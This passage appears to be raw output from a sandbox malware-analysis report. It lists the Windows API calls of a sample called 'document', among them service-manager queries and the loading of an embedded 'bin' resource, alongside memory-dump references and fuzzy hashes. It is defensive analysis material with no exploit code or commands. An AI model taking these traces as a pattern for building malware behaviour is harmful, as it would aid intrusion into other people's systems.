                                                                  • GetEnvironmentStringsW.KERNEL32(74DF0A60,00000000,?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AA7B
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,74DF0A60,00000000,?,?,?,?,00425EA6), ref: 0042AAAF
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AAD1
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AAEA
                                                                  • GetEnvironmentStrings.KERNEL32(74DF0A60,00000000,?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AB00
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0042AB3C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 883850110-0
                                                                  • Opcode ID: 40f71a07fb731069f870aded68a57151302da6b8d9c26e8109ee9f5d2242545d
                                                                  • Instruction ID: 46c70b45b6b314e6cb2813fa54a0f67757c5fcac65bc45981b8617f7325219ec
                                                                  • Opcode Fuzzy Hash: 40f71a07fb731069f870aded68a57151302da6b8d9c26e8109ee9f5d2242545d
                                                                  • Instruction Fuzzy Hash: B231E6727042356FDB206F797E8483BBA9DEF55354795083BFE41C3200E5699CA1C2AB
                                                                  APIs
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0042ABA8
                                                                  • GetFileType.KERNEL32(?), ref: 0042AC52
                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 0042ACD3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleInfoStartupType
                                                                  • String ID: d'C
                                                                  • API String ID: 2461013171-2240747681
                                                                  • Opcode ID: 9c9765b1c5c0627e8e973e8c1add589c80f9ae6c84f51899f8b01996c9bb0cbd
                                                                  • Instruction ID: b91d51b33192239ebbe76f0b008aa2615b8e70416bf349f0ebea2a7c65bc7c7e
                                                                  • Opcode Fuzzy Hash: 9c9765b1c5c0627e8e973e8c1add589c80f9ae6c84f51899f8b01996c9bb0cbd
                                                                  • Instruction Fuzzy Hash: 2851F3713047218FD720CF29E9847227BE4FB11325FA4466ED9A6CB2E2D778D425C70A
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,?,?,0040B501,00000000,00000000,00000000), ref: 0040769F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: c463d438678264e65f411a84fba0301f23ed1ad1e798f240ad9d3939515fa36f
                                                                  • Instruction ID: 9a062db39f6a5f139ad70d347d9c9746101c966207b1449d83cde9679a236ffa
                                                                  • Opcode Fuzzy Hash: c463d438678264e65f411a84fba0301f23ed1ad1e798f240ad9d3939515fa36f
                                                                  • Instruction Fuzzy Hash: 18315CB2608300AFD350DF29DC81F9AB7E8BB88714F50493AF245D6290D7B4E945CB9A
                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000,00431C98,0042051B,?,00431CEC), ref: 0041EFAA
                                                                  • GetLastError.KERNEL32 ref: 0041EFB6
                                                                  • OpenServiceA.ADVAPI32(00000000,000000EF,00000004), ref: 0041EFD0
                                                                  • GetLastError.KERNEL32 ref: 0041EFDA
                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0041EFE7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastOpenService$CloseHandleManager
                                                                  • String ID:
                                                                  • API String ID: 48634454-0
                                                                  • Opcode ID: 3f7bc6f18e424998c14db061a0019771ee9b78516ee7a0c5797ab8af1a1bb4e5
                                                                  • Instruction ID: 89dee9bad4ab5eec4a1989d4adc2e41a6cfd6003cc042db67122dc7d02015971
                                                                  • Opcode Fuzzy Hash: 3f7bc6f18e424998c14db061a0019771ee9b78516ee7a0c5797ab8af1a1bb4e5
                                                                  • Instruction Fuzzy Hash: BEF03136205220AFD361AB66DC08F8BB7E4EFA5350F518426FA409B250C7B49843CBA5
                                                                  APIs
                                                                  • GetStringTypeW.KERNEL32(00000001,0042EB1C,00000001,?,0042EFF0,0000001C,0042B0D3,00000001,00000020,00000100,?,00000000), ref: 0042B58E
                                                                  • GetLastError.KERNEL32 ref: 0042B5A0
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,0042B335,00000000,00000000,0042EFF0,0000001C,0042B0D3,00000001,00000020,00000100,?,00000000), ref: 0042B602
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0042B335,?,00000000), ref: 0042B680
                                                                  • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 0042B692
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3581945363-0
                                                                  • Opcode ID: 065b806abc50d4fe4b2ec313b7b0f5159d82bf3686ad449a59d1a901a37e99c5
                                                                  • Instruction ID: f0f8bd57be9de59517cc605bd017ac116da641922c0873b55133153ad94c77ef
                                                                  • Opcode Fuzzy Hash: 065b806abc50d4fe4b2ec313b7b0f5159d82bf3686ad449a59d1a901a37e99c5
                                                                  • Instruction Fuzzy Hash: 8041C231A00235EBCB219F61FC45BAF3B65EF48760F94411AF914A7290C779C951CBE9
                                                                  APIs
                                                                  • lstrlenA.KERNEL32 ref: 0041AEB7
                                                                    • Part of subcall function 0041BC30: WaitForSingleObject.KERNEL32(?,?), ref: 0041BCA3
                                                                    • Part of subcall function 0041BC30: GetOverlappedResult.KERNEL32(000000FF,?,00000001,00000000), ref: 0041BCB8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectOverlappedResultSingleWaitlstrlen
                                                                  • String ID: TI$I$Q$T$U
                                                                  • API String ID: 1203007601-4180699136
                                                                  • Opcode ID: ed0303fd2a6afdd30154ecfc88d90d6c20b075749df1e2260d2f0a960f33f61a
                                                                  • Instruction ID: 301686960094d4809af912793bbcb5906ed8551e1f1d0e03f2bc55d77cb3246a
                                                                  • Opcode Fuzzy Hash: ed0303fd2a6afdd30154ecfc88d90d6c20b075749df1e2260d2f0a960f33f61a
                                                                  • Instruction Fuzzy Hash: 19F0C26510C390AED301D329D84479FBFC49BD5318F48C95EF0DC86291D678C588C767
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(80000000,80000000,0042E40C,0000000C,00000001,00000080,00000000,?,00000000,00000000), ref: 0042C753
                                                                  • GetFileType.KERNEL32(00000000), ref: 0042C760
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0042C76B
                                                                  • GetLastError.KERNEL32 ref: 0042C771
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateErrorHandleLastType
                                                                  • String ID: H
                                                                  • API String ID: 1809617866-2852464175
                                                                  • Opcode ID: 5acbd022d4c685c672e8b32a6492f5429315f7eb7d62e1f33d6d612d01017a3e
                                                                  • Instruction ID: 102a8983cbf31db5d01c2ed3558011b335ab8adb99a249c34fa16b283160ce35
                                                                  • Opcode Fuzzy Hash: 5acbd022d4c685c672e8b32a6492f5429315f7eb7d62e1f33d6d612d01017a3e
                                                                  • Instruction Fuzzy Hash: BD813730B042359AEF209BA4F8C57BF7B60AF02314F94415BE451A72C1C7BD8D46DB9A
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(?,?,00000000,00000000), ref: 0042B1F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: %C$ %C$0&C$0&C
                                                                  • API String ID: 1807457897-4187950356
                                                                  • Opcode ID: d826fc4024eadb98fb72cef3239cdade29673fa25cc58c45b58d71fc301ab029
                                                                  • Instruction ID: 3a9998ec9ef1a123eeabf32567b225ac1ab3f60614b48bddbca3475532a99bbe
                                                                  • Opcode Fuzzy Hash: d826fc4024eadb98fb72cef3239cdade29673fa25cc58c45b58d71fc301ab029
                                                                  • Instruction Fuzzy Hash: FA413670A043609ED705CF64E99427EBBA1DB09304FA864BBD985C7351C37D8A46CBED
                                                                  APIs
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0040B167
                                                                  • ReadFile.KERNEL32(00000000,?,00000020,?,00000000), ref: 0040B183
                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000020,00000000), ref: 0040B1A8
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000004,00000020,00000000), ref: 0040B1C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$Read$Pointer
                                                                  • String ID:
                                                                  • API String ID: 2018848721-3916222277
                                                                  • Opcode ID: b0338f8490f42302bf71fa0a2cc46a806d0b2b0ea2550c8dbc934b7e51b3abfe
                                                                  • Instruction ID: 866c534031c73db29c2cd1ecf333b056677a8ac96b3e8d6862a38f2d8022ddcb
                                                                  • Opcode Fuzzy Hash: b0338f8490f42302bf71fa0a2cc46a806d0b2b0ea2550c8dbc934b7e51b3abfe
                                                                  • Instruction Fuzzy Hash: 4E419C71900208EBDB24EB95CD84BEEB7B8BF44304F14412EE902772D1EB786945CBA9
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,bin), ref: 00421DF1
                                                                  • LoadResource.KERNEL32(?,00000000,?), ref: 00421E03
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoad
                                                                  • String ID: bin
                                                                  • API String ID: 2619053042-2854705901
                                                                  • Opcode ID: 9e540646f44935ccf111df009b3db933e214dc997df41f60f4d3731703041fe4
                                                                  • Instruction ID: 9d8cb5d61aa00d475561c7ecdaaca8325d521027bad4654bdbc150deacd057bb
                                                                  • Opcode Fuzzy Hash: 9e540646f44935ccf111df009b3db933e214dc997df41f60f4d3731703041fe4
                                                                  • Instruction Fuzzy Hash: AFF062723013315BC7219F6AAC889977BADEFD57A2755483AF901C7210C774C80287B4
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00424727
                                                                    • Part of subcall function 0042509E: RaiseException.KERNEL32(?,?,0042D4D3,004301F4,?,0042E4A8,?,?,?,00424841,0042D4D3,004301F4,00432030,00413E01,0042D4D3,000000FF), ref: 004250CC
                                                                  • __EH_prolog.LIBCMT ref: 00424767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$ExceptionRaise
                                                                  • String ID: hB$invalid string position$string too long
                                                                  • API String ID: 2062786585-4136523384
                                                                  • Opcode ID: 88d8fa90d7c6c8d718b7f6f7407bcfcb0e3c6434c47ad0064ef0aedc0834ee80
                                                                  • Instruction ID: 11e73fe8e2f787134ba4100129d5177836af9054e9acb309ed81b3bbf2727209
                                                                  • Opcode Fuzzy Hash: 88d8fa90d7c6c8d718b7f6f7407bcfcb0e3c6434c47ad0064ef0aedc0834ee80
                                                                  • Instruction Fuzzy Hash: E1F012B2B101389AC700F7D5E945ADDB774AB18319FD0416BE101B5085DBF85608CB6D
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,00425255,?), ref: 004276FB
                                                                  • InterlockedExchange.KERNEL32(00432200,00000001), ref: 00427779
                                                                  • InterlockedExchange.KERNEL32(00432200,00000000), ref: 004277DE
                                                                  • InterlockedExchange.KERNEL32(00432200,00000001), ref: 00427802
                                                                  • InterlockedExchange.KERNEL32(00432200,00000000), ref: 00427862
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ExchangeInterlocked$QueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2947987494-0
                                                                  • Opcode ID: 9d0e1f8ca3f94a46a9c43039f82332cbc11742f84446677a94a17d3fc60db3ea
                                                                  • Instruction ID: 69315932293a6f15bc6fa72f35dddf1ea49eabd3a30424e24b4ce32bea02e01f
                                                                  • Opcode Fuzzy Hash: 9d0e1f8ca3f94a46a9c43039f82332cbc11742f84446677a94a17d3fc60db3ea
                                                                  • Instruction Fuzzy Hash: EA510730B086319BDB248B19FAC4B3A73A1AB41724FA5956FD511873E1D3B8EC81C65C
                                                                  APIs
                                                                    • Part of subcall function 004074A0: WaitForSingleObject.KERNEL32(?,000000FF,?,?,00419270,00000002,?,0000000A,00000000,?,?,?,?,?,?,?), ref: 004074AC
                                                                    • Part of subcall function 004074A0: ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074C9
                                                                    • Part of subcall function 004074A0: ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074DD
                                                                    • Part of subcall function 0040B610: ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000000), ref: 0040B70E
                                                                    • Part of subcall function 0040B610: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B728
